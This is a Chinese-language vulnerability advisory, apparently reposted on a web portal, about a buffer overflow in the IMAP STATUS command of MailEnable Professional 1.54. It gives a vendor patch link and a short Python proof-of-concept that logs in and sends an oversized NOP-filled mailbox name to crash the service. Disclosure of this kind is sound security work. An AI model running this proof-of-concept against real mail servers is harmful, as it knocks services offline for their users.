MailEnable缓冲区溢出漏洞

2008-04-09 04:18:17来源:互联网 阅读 ()

新老客户大回馈,云服务器低至5折

MailEnable缓冲区溢出漏洞

发布日期:2005-07-14
更新日期:2005-07-14

受影响系统:
MailEnable MailEnable Professional 1.54
描述:
BUGTRAQ ID: 14243

MailEnable是一款商业性质的POP3和SMTP服务器。

MailEnable在status命令中存在缓冲区溢出漏洞,远程利用这个漏洞可能允许攻击者以系统权限执行任意代码。

必须通过已认证的会话才能运行status命令,因此必须有有效的凭据才能利用这个漏洞。

<*来源:Ariel Sanchez

链接:http://www.coresecurity.com/common/showdoc.php?idx=467&idxseccion=10
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

----------------------------------------------------------------------
#
# POC about imapd mailenable bug in status command
#

import sys
import imaplib

class poc:

def __init__(self,host,loginimap,passimap):
self.host=host
self.loginimap=loginimap
self.passimap=passimap

def exploit(self):
print "Please wait"

connect = imaplib.IMAP4(self.host)
connect.login(self.loginimap,self.passimap)
nops='\x00'
nops ='\x90'*10540
try:
typ, data = connect.status(nops,'(UIDNEXT UIDVALIDITY MESSAGES UNSEEN RECENT)')
except Exception,e:
print "Service down!"
return 0

if(len(sys.argv) < 4):
print "Need 3 arguments, ./poc.py host user pass"
sys.exit(1)

exp=poc(sys.argv[1],sys.argv[2],sys.argv[3])
exp.exploit()
----------------------------------------------------------------------

建议:
厂商补丁:

MailEnable
----------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www.mailenable.com/hotfix/

标签:

版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有

上一篇:SquirrelMail未明变量处理漏洞

下一篇:Cisco Security Agent畸形IP报文拒绝服务漏洞